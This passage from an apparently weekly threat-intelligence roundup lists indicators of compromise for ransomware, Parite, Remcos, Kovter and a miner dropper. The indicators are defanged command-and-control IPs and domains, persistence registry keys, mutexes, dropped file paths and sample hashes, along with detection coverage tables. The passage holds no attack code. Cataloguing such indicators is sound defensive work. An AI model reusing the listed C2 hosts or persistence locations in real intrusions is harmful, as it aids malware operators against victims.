\n`216[.]239[.]34[.]21` | 5 \n`216[.]239[.]38[.]21` | 4 \n`216[.]239[.]32[.]21` | 3 \n`148[.]81[.]111[.]121` | 2 \n`88[.]198[.]69[.]43` | 2 \n`194[.]150[.]168[.]74` | 2 \n`216[.]239[.]36[.]21` | 1 \n`192[.]35[.]177[.]64` | 1 \n`52[.]2[.]137[.]199` | 1 \n`104[.]216[.]88[.]248` | 1 \n`162[.]255[.]119[.]227` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ipinfo[.]io` | 13 \n`epmhyca5ol6plmx3[.]wh47f2as19[.]com` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]fi` | 13 \n`epmhyca5ol6plmx3[.]tor2web[.]blutmagie[.]de` | 13 \n`7tno4hib47vlep5o[.]7hwr34n18[.]com` | 13 \n`ant[.]trenz[.]pl` | 2 \n`ymxunc[.]com` | 1 \n`iiiavb[.]com` | 1 \n`ergcgi[.]com` | 1 \n`giyxhd[.]com` | 1 \n`lxecov[.]com` | 1 \n`ymjjaz[.]com` | 1 \n`uunzlo[.]com` | 1 \n`exukeu[.]com` | 1 \n`ogcfic[.]com` | 1 \n`ihpuyg[.]com` | 1 \n`yqnonu[.]com` | 1 \n`hzadcu[.]com` | 1 \n`fogwee[.]com` | 1 \n`aiszao[.]com` | 1 \n`fasuoi[.]com` | 1 \n`bsieau[.]com` | 1 \n`azuyzw[.]com` | 1 \n`aldcea[.]com` | 1 \n`gknysc[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\key.dat` | 15 \n`%APPDATA%\\log.html` | 15 \n`%APPDATA%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Desktop\\CryptoLocker.lnk` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.bmp` | 15 \n`%HOMEPATH%\\Desktop\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Links\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Favorites\\Microsoft Websites\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Local Settings\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\NetHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\PrintHood\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Recent\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\SendTo\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Start Menu\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\Templates\\HELP_RESTORE_FILES.txt` | 15 \n`%TEMP%\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\Microsoft\\Internet Explorer\\HELP_RESTORE_FILES.txt` | 15 \n`%HOMEPATH%\\My Documents\\HELP_RESTORE_FILES.txt` | 15 \n`%APPDATA%\\<random, matching [A-Fa-z0-9]{5,8}.exe` | 15 \n`\\$Recycle.Bin\\HELP_RESTORE_FILES.txt` | 13 \n`\\$Recycle.Bin\\S-1-5-21-2580483871-590521980-3826313501-500\\HELP_RESTORE_FILES.txt` | 13 \n`%HOMEPATH%\\AppData\\HELP_RESTORE_FILES.txt` | 13 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0440593af56240ec063b2b37c106fc13375c2f503fdb707f9a83dd512c110430 11aaa79c21033387be690f5cf986c3c665d935a73682a16f5468c0b0a29ad2b6 1ccde26dc844e8c9fac9f94c2b4b1280fb69bd4f6759b944773e37be54e0d893 48113627269680d6875edef5b537babe9f99b2beb24aa1bc59aba2c12a8db364 4dff2478037871b72eecbeed8e0c4ba84aa0eab8ae54282a172cfb2059ceb74a 561465d60606ce7533cc049cc5025c426d888acf44d3334bcb5ff124cc9beb9f 58712cf1cab21e5e62d71ac9291eddcbda43944dc85f3eb91cee93d603761d56 5b076ac98c514923e6eb20cb3bd64db901988976af434052d5537c258a03614e 5eb80c4b9818c022a4b1e7cc5dbfca4c573cf76dfaf8ce7f8f8fa31dfbf77c4c 733f08642330249b7362d5496e7d5ddc660e69b99fcbf0128f3f6e647714dd86 7cc97b2908e9d76a917b37ca6433d451a5a0d866e18b0f92146c25bb56847a35 9b462800f1bef019d7ec00098682d3ea7fc60e6721555f616399228e4e3ad122 b1fbb20c2a4df11fe9a316156977f4f842c3c1f150c10e873cbac59aec43426c b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014 bc2622816c972a21201772fd8b7635ecff8c1fcb6249dd02266ab92f1fa2687f c4fa6dc2ae89d1530423bb9842af7ba8e800b05ff81315130f9de893beb89288 da624ceb034570a844d919d20f1ac7db99516558cb6e2571e1ddd2f46d73c7e5 e27f924db5152237a6783a43d6bd982ab3dbd0e22aee3e8dc70980b083cff767 eccfe2366884a5a947aad1c26277043e3af20e6d1cf8e27b48e0bb72b1e963bd fc8946571e73d04ade5a3308de8b191eb747667fb31aa10162174542674a9746 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-0W13rKGvaSM/XURD-ARjbzI/AAAAAAAAB5M/C_JpTRreNg07q7OT4vK3Ji_4Xjo08RAFQCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-NBjRP-eCVtc/XUREDbwSYjI/AAAAAAAAB5Q/3s2qjGor-eEZxUysFeyMYg2nZwEZl0K7QCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-1BAR8R8PCBQ/XUREKLL4NAI/AAAAAAAAB5U/ntsJfLx-dUs5f9cVwtn1BzyKTvi6wPHdgCLcBGAs/s1600/bb276ee7a6272c91c77fd973e1cd2a42e04274ca122eb28f4445cc1e8e49a014_umbrella.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-Q4usCsyVhqo/XUREOn3AtaI/AAAAAAAAB5c/B8b0WCNgW1c5kZZmtNwBbUGsd3k-tEk9wCLcBGAs/s1600/b7b24dc901e44293beaaa7ec379b8e8feb917abde42fdcdb38de5eda3cb147fa_malware.png>)\n\n** \n**\n\n* * *\n\n### Win.Virus.Parite-7090021-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Wow6432Node\\Intel\\ICCInst ` | 25 \nMutexes | Occurrences \n---|--- \n`Residented` | 25 \n`Global\\IIF-{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 21 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 21 \n`%TEMP%\\bna1.tmp` | 2 \n`%TEMP%\\fpa1.tmp` | 2 \n`%TEMP%\\edb242D.tmp` | 1 \n`%TEMP%\\ldb2574.tmp` | 1 \n`%TEMP%\\spb9CB6.tmp` | 1 \n`%TEMP%\\ceb291C.tmp` | 1 \n`%TEMP%\\ddb2324.tmp` | 1 \n`%TEMP%\\rpb98B0.tmp` | 1 \n`%TEMP%\\npb9788.tmp` | 1 \n`%TEMP%\\txbEAC6.tmp` | 1 \n`%TEMP%\\upb96CD.tmp` | 1 \n`%TEMP%\\hob9547.tmp` | 1 \n`%TEMP%\\opb9A94.tmp` | 1 \n`%TEMP%\\mhb4D7E.tmp` | 1 \n`%TEMP%\\feb2832.tmp` | 1 \n`%TEMP%\\lrbB277.tmp` | 1 \n`%TEMP%\\veb29D8.tmp` | 1 \n`%TEMP%\\ngb3F89.tmp` | 1 \n`%TEMP%\\apb9602.tmp` | 1 \n`%TEMP%\\vgb41DA.tmp` | 1 \n`%TEMP%\\ogb4093.tmp` | 1 \n`%TEMP%\\qgb3FA9.tmp` | 1 \n`%TEMP%\\hgb4257.tmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0de64a980bd8ba77c2d6f216bac219376a5981e3e3bca7fb7797d8658e0af56f 1a949bb288102e17fc51645e7cbf098ccdaa3fb5414d2874f454b67133cfeff6 1ac60ed1f894fc3758748ba428554b91253af824d56972e3af76f3b4932d75f8 2571f483b3363c6f4e31b5fe674958ecd78f10c82211b56e3a3da07175404f5c 2f59cc275a2306af4c0c22aabbb672fe316358b105b8aa1d1df9e34e8b8141ba 32438083d79ac23f89bc2f96befd073ca3f4a30f831aa85dcded3f0e6bde168a 363ba569063f98eed6553089dd75c19d8f87f8adc171a4c707f6e4158cd0b37c 3ce4b7ade0171971c2c8106b9b58fa5432e8feba8d10b80f2a82f87511eb4a84 3efcc75fac41f6a3f8cf626753c72f6df00ff8617640989bfc67f284a6782eab 42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965 47be4b0e8768289addb59602b024887db8c8ebca026bc054eb1d03f6602e09b7 4d6b7067ff55b4e5025f0713aa0f93328ca500444f5c52c4b84993d0c00a3675 5386a3f5dfa37f454ce6ea8aba622cdea0e1a6e7bfee4b34c3235eeb6ca7c21d 5e5e207352827e19880e32e481281ae32a895bfa47af7702cbeb49f6a90404a6 66da22fd2c8d82e6267c6b21d03dd20f1fb9f242170f4a3c2b0e05b337a1080c 919864b47bbb9dc802df79a974f0a119e79e4ddab76c01cf79071d9a4866c8df 9220f5a71a621ac56ab75aef023d15fedf18fe40dd094a2409a1586712b929b0 949add118d6e884685a78104077991d8cff1a0b9b28e8359d551ab4b698b3af8 9ceee0623cb6c2c1f94b4cb90b2a0cfb6a07e203e3d901b8c5a2cfcba34d46ca 9d60933316a5def1ddf71e9dddbcd48b2b2f5cd711cc7dd1ce1354655dbcd2a9 bd8d558604fc04fde215abf52ed73ecde6a7f97bfd48f9540b8dc823054525a8 c07b02bff8ebaa27f5da40de8c92ba78c2f9a1d3c76dee6c4f76596594d68f0f c71ced95ef06e91dd6083a21bfae4bcf5696ba91d5b7c25b1ce62e2fbc58450c cf0face1fb821f4ce1944f65549e242b1b033e7525921c3e24d027dd4efbcaa6 ea873fa6d0bad68c2f2c52949a2eb10aadf140ad0cf5b5b753819a1063a14fbb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-5OIquQni3Tc/XUREW1tDmaI/AAAAAAAAB5k/mgOvZoV1OxUUducbCoQjJEAzYbcV9eQwwCLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-Oo_A84lo6jI/XUREdFEafrI/AAAAAAAAB5s/H2CIxZ4cZyM13kFAs0y4Hokyp_ITEeuFACLcBGAs/s1600/42dcaf24b47e158c5bde0bf37aca7494cf4a318203205fd44d8a957fb4a54965_tg.png>)\n\n \n\n\n* * *\n\n### Win.Malware.Remcos-7089920-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\Software\\Microsoft\\Windows Script Host\\Settings ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: task ` | 22 \n`<HKCU>\\Software\\Remcos-F5NWKC ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: exepath ` | 14 \n`<HKCU>\\SOFTWARE\\REMCOS-F5NWKC \nValue Name: licence ` | 14 \n`<HKCU>\\Software\\Remcos-FNLRTG ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: exepath ` | 6 \n`<HKCU>\\SOFTWARE\\REMCOS-FNLRTG \nValue Name: licence ` | 6 \nMutexes | Occurrences \n---|--- \n`Remcos_Mutex_Inj` | 22 \n`Remcos-F5NWKC` | 16 \n`Remcos-FNLRTG` | 6 \n`Global\\82814f21-b3c0-11e9-a007-00501e3ae7b5` | 5 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`192[.]69[.]169[.]25` | 14 \n`179[.]33[.]146[.]222` | 6 \n`172[.]217[.]7[.]238` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`abeasinf[.]duckdns[.]org` | 14 \n`remsalvados2019[.]duckdns[.]org` | 6 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\install.vbs` | 22 \n`%APPDATA%\\remcos` | 20 \n`%APPDATA%\\remcos\\logs.dat` | 20 \n`%APPDATA%\\System32` | 16 \n`%APPDATA%\\System32\\task.exe` | 16 \n`%APPDATA%\\explored` | 6 \n`%APPDATA%\\explored\\task.exe` | 6 \n \n#### File Hashes\n\n` 07e4832ad064b83345dc65d845c656acb036d1ba416aeba93ea1e5e455e5d93f 0e4ef97aaa97a61adfcbcc801ae9bf1554aff454f17ecc1c12ae1b78de63a82f 0f73749d1f1275074b813d85df5da536242a5dd841df5e6beccda497da11c688 2428324467859f295b59fa94ae4a2d46383e727ecde439b9ae8a98ee3a058c82 33b9073da941fe67d1c2d6ac3db931a12dd16eff3e40614d142ba9f20a2f6cfa 40ddc409d3c26b0d6718b9933242c6c8a317d82626f2b5657b6d53ca1e94f8b9 4eb7eb5ff66633577f584e08638eddb1f175295dc6f140e4daaa499503c7903d 53d5a95234af1e094671269c8de5e54675495a7d6ff7d00736ebc9c5d7f9233e 603b1c659c004167578170b44c3b953eeed7caf47dcf878cde6a085e096b2d0a 615d24c911f1a5f99250f0b16003d1a52f22f9f9e3560863f542f624132239b0 637f60b9ca2e20c192e3c9758972477cf4389a0e6b86d2e68e3712855eaf5bf4 6cc16b02084076c656e304e81712f27f8813d7b97b8851517946a7e2cc933d31 6f54f3d6d8c7f4487e56368ee015c1d4fbc00bc77bdc76b45d14530ca28980ef 7a1fbd0098df288e866f3cc6cad071a616fe4916f5f489d6ddda5bc077c7bbdd 868dc90c4bbc89a2b21cea9d234e4189578b6c3beeb590126ae6ae949f62eaf4 8ee5bda36b3104b33ac8f5e8b8ac9828717e27bc8a66a8bd24a85f01bf84a95f 8f9a5246320b31ca9e48b8e8ff53918705d311a8afd6dd144797166751a6d469 9a8e4530aa2a8aaad91f72014d2b2878f557c3e424fc4f0b9ff3e6768f8fe912 9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52 9bd3531c471b33207020377534b3bd9bbf5ea46a0a20006952b8627ff400fc51 a03f12df245983e127285885886bbe98377cafb7bbcd11e26bf0b8841ff991e9 a13e9d6bd38f8579d6bb06fb51be5354fd3e7704adf159817499d1bc536091a1 a98a627f7eeeba6267037bab8ad15c6443547a1d1fcd148d6a7934ffa6e1062e acc90634c7b0d8ebb28d8763c5395eb4b715a66b0caf2b299921be3b7fd3593d b06c46bcb19243e30ed996e2af8ba284f413863bc57402345bc09b5e42389ceb `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-thT-pcUBWcg/XUREm_ltKQI/AAAAAAAAB50/Cmxva5n-PmE4GUaZxZRmx25b8_rxEGjBQCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-yNNkbQreVXg/XURErr17JOI/AAAAAAAAB54/w5ccfeVvSzIBMUXioi8tt4lA-uYKjulxwCLcBGAs/s1600/9b38f1d468eb8b5accb360d34de2e6522e23c0b07a8b64fc7b42b2ffd4cb5d52_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Kovter-7086582-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run ` | 25 \n`<HKCU>\\SOFTWARE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3a91c13ab1 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 656f27d6 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 96f717b3 ` | 25 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKCU>\\SOFTWARE\\3A91C13AB1 \nValue Name: 01b2a448 ` | 23 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\zT1Dki ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\5F287F4F75829A94 \nValue Name: 016CFBC1BABEFF10 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: CpYrHqV ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\ZT1DKI \nValue Name: 39WZL4 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\olRmhsU ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\90ED0D761B2FB199A \nValue Name: 7A09ED122AF4ECD0E83 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: vsctEaBx ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\OLRMHSU \nValue Name: 80de8Ae ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\l0CEbsVa ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\C9E39C761A77CAC1DC \nValue Name: E6D1B26BEF7541793FF1 ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: rSCO76J ` | 1 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\L0CEBSVA \nValue Name: PY7gGpGla ` | 1 \nMutexes | Occurrences \n---|--- \n`EA4EC370D1E573DA` | 25 \n`A83BAA13F950654C` | 25 \n`Global\\7A7146875A8CDE1E` | 25 \n`B3E8F6F86CDD9D8B` | 25 \n`\\BaseNamedObjects\\408D8D94EC4F66FC` | 25 \n`\\BaseNamedObjects\\Global\\350160F4882D1C98` | 25 \n`\\BaseNamedObjects\\053C7D611BC8DF3A` | 25 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`157[.]249[.]130[.]189` | 1 \n`112[.]51[.]201[.]117` | 1 \n`53[.]61[.]24[.]171` | 1 \n`119[.]97[.]239[.]35` | 1 \n`188[.]236[.]23[.]197` | 1 \n`1[.]165[.]149[.]97` | 1 \n`27[.]173[.]241[.]96` | 1 \n`147[.]117[.]235[.]220` | 1 \n`26[.]218[.]146[.]92` | 1 \n`209[.]73[.]97[.]109` | 1 \n`139[.]121[.]49[.]82` | 1 \n`119[.]149[.]159[.]187` | 1 \n`191[.]184[.]185[.]179` | 1 \n`6[.]40[.]66[.]225` | 1 \n`112[.]117[.]175[.]94` | 1 \n`172[.]43[.]49[.]44` | 1 \n`6[.]214[.]160[.]88` | 1 \n`28[.]29[.]189[.]12` | 1 \n`60[.]97[.]36[.]141` | 1 \n`99[.]24[.]117[.]121` | 1 \n`192[.]242[.]171[.]82` | 1 \n`74[.]101[.]122[.]65` | 1 \n`5[.]107[.]225[.]199` | 1 \n`165[.]64[.]226[.]220` | 1 \n`109[.]209[.]166[.]138` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`A` | 25 \n`api[.]w[.]org` | 1 \n`home[.]pl` | 1 \n`php[.]net` | 1 \n`www[.]interworx[.]com` | 1 \n`www[.]openssl[.]org` | 1 \n`apache[.]org` | 1 \n`lod[.]is` | 1 \n`dev[.]allsystemsgomt[.]com` | 1 \n`allsystemsgomt[.]com` | 1 \n`allsystemsgocomputer[.]business[.]site` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`1.txt` | 25 \n \n#### File Hashes\n\n` 0c308626f38e758cdb362c216e98b86754423ee8a7db0c6cdc73e9aaacbfbd57 158542e3697bb1d467a68b50035950a6eee3f4cdf4a87ef35ec280f092aa8f24 179bfcba0795d5b8c53cd381a3bd5272b0ba170cb76312263f7cf7fa9801950b 17f14b4856e5f4919f908400d8789cc8388381989d4f1333ec6c70346c8d78d3 1c6937a286b18f016d6687ba872b0d19cf99932f523b8c9b98e5203dce8636b3 246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426 2a10ba74892b50cfe9338482c758d0eff0f62c2cf5e5750c05779d9c67381bd5 4839855b43c168a5f5a92266906c8b070cc65d496e0f37978b6f34eae30327b2 48dccfab3d58e5370ddd4481768e7f66fe259364367c7ae40a45ed74ef67323a 4e78f30bb53f103efa2923359348c48d1cff85fb481ee60c70fb7937f44d6f0d 4f9607712eaad7066f27a05e427dc18661cb6f4847d59027ae1ef20400975a9f 4fda5660b594ab93dfac2a37a0bb114b8d68fc51334431f3d1c1ddb982dd6446 500fd828118c21813966513f5fd4d0badebae33e7b8280a95a8924a4a5eebba1 59ac65640ef6b7d2236b869ad56315567652eaa87c9161ec001950b00ca98608 60bd60bdf77e61d2acbf4980229ae21a2ac24ea381f58ca5cbc1d67fc1ed6775 62fdea9bdc0d4ed1f1c05f333af859f548e1442eaacbdac8645750694d4e575d 7148d96630544e09b466bddc4a8ac60eeadc05af9afb4dbc85a8621a93400c18 7a21fa88108ed9456d3a462c9c57487c8def488728995b2a858d13641465df5d 7d07b0f68bd1873e5372cc79d7e24e4d2c70d5fdc55ad01aff968c42a428d484 866c5a060cf8f44209a39d358ec0c6a872317f3957f08609b1817774eabce57f 8e08a03289e73d0bf196fcb4f36a16ab547f9eb4ef6f38ff20fa70d898871ee0 9acb88217e012f43bdfa085b062c5da48ab5dd5ed888be77f9617a1ba2400c93 a89ace7661f6189a698955d46e97ebe3da70a308e25a4b7862c5dde9b3d4776c afb3a3ca5db5736154aabfc6e86bd31b7c0fb725fdc67eb42a02e0e211f9831c b092d2e89c04741e1d5150767a0e79a49e6edb05a142ccb7a971373c2abb3ae8 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-o34qMZeyPt0/XUREzY-N5rI/AAAAAAAAB58/K6qHa7fPO2s6pBctlYFhhBUiw5oAkSo6ACLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-q20I_iz9jOk/XURE4RjotAI/AAAAAAAAB6E/pE7q6UzjzfEs5TK--wg675yzwdVyYUUSQCLcBGAs/s1600/246b9a16823df5dce07e6435afd691833a4056b87c51cfa8812b82c156063426_tg.png>)\n\n \n\n\n* * *\n\n### Win.Dropper.Miner-7086571-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Quarantined ` | 21 \n`<HKLM>\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Compatibility Assistant\\Monitored ` | 21 \n`<HKCU>\\Software\\OCS ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: CID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: PID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastPID ` | 21 \n`<HKCU>\\SOFTWARE\\OCS \nValue Name: lastSID ` | 19 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\75E0ABB6138512271C04F85FDDDE38E4B7242EFE \nValue Name: Blob ` | 2 \nMutexes | Occurrences \n---|--- \n`Local\\https://www.chip.de/` | 2 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`23[.]13[.]208[.]26` | 17 \n`91[.]199[.]212[.]52` | 11 \n`176[.]9[.]97[.]244` | 11 \n`5[.]9[.]198[.]83` | 10 \n`5[.]9[.]176[.]3` | 10 \n`5[.]9[.]116[.]27` | 6 \n`5[.]9[.]175[.]19` | 4 \n`204[.]79[.]197[.]200` | 2 \n`172[.]217[.]12[.]198` | 2 \n`54[.]210[.]244[.]131` | 2 \n`64[.]202[.]112[.]63` | 2 \n`23[.]6[.]70[.]227` | 2 \n`13[.]107[.]21[.]200` | 1 \n`151[.]101[.]2[.]2` | 1 \n`151[.]101[.]66[.]2` | 1 \n`173[.]223[.]56[.]52` | 1 \n`173[.]223[.]236[.]173` | 1 \n`96[.]6[.]22[.]211` | 1 \n`96[.]6[.]29[.]52` | 1 \n`64[.]202[.]112[.]31` | 1 \n`70[.]42[.]32[.]31` | 1 \n`23[.]32[.]81[.]249` | 1 \n`23[.]41[.]180[.]26` | 1 \n`35[.]158[.]10[.]18` | 1 \n`104[.]121[.]102[.]142` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`api[.]chip-secured-download[.]de` | 21 \n`e3056[.]dscg[.]akamaiedge[.]net` | 12 \n`www[.]chip[.]de` | 12 \n`ocs3[.]chdi-server[.]de` | 10 \n`ocs2[.]chdi-server[.]de` | 6 \n`crt[.]usertrust[.]com` | 5 \n`ocs1[.]chdi-server[.]de` | 4 \n`schema[.]org` | 2 \n`ad[.]doubleclick[.]net` | 2 \n`odb[.]outbrain[.]com` | 2 \n`tcheck[.]outbrainimg[.]com` | 2 \n`log[.]outbrainimg[.]com` | 2 \n`widgets[.]outbrain[.]com` | 2 \n`mcdp-nydc1[.]outbrain[.]com` | 2 \n`efahrer[.]chip[.]de` | 2 \n`gutscheine[.]chip[.]de` | 2 \n`services[.]chip[.]de` | 2 \n`www[.]summerhamster[.]com` | 2 \n`filestorage[.]chip[.]de` | 2 \n`apps[.]chip[.]de` | 2 \n`search[.]chip[.]de` | 2 \n`mms[.]chip[.]de` | 2 \n`www[.]interred[.]de` | 2 \n`www[.]chip-kiosk[.]de` | 2 \n`chip[.]info` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\DMR` | 21 \n`%TEMP%\\DMR\\dmr_72.exe` | 21 \n`%HOMEPATH%\\NTUSER.DAT` | 21 \n`%HOMEPATH%\\ntuser.dat.LOG1` | 21 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\Content\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`%APPDATA%\\Microsoft\\CryptnetUrlCache\\MetaData\\E0968A1E3A40D2582E7FD463BAEB59CD` | 20 \n`\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\CLSID\\{D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E}\\LocalServer32` | 1 \n`%TEMP%\\DMR\\ishnuwkqraonlvar.dat` | 1 \n`%TEMP%\\DMR\\usbxlrosrdztgwpi.dat` | 1 \n`%TEMP%\\DMR\\seysuwrfdtqhnrpj.dat` | 1 \n`%TEMP%\\DMR\\xglpmhfhfspocakr.dat` | 1 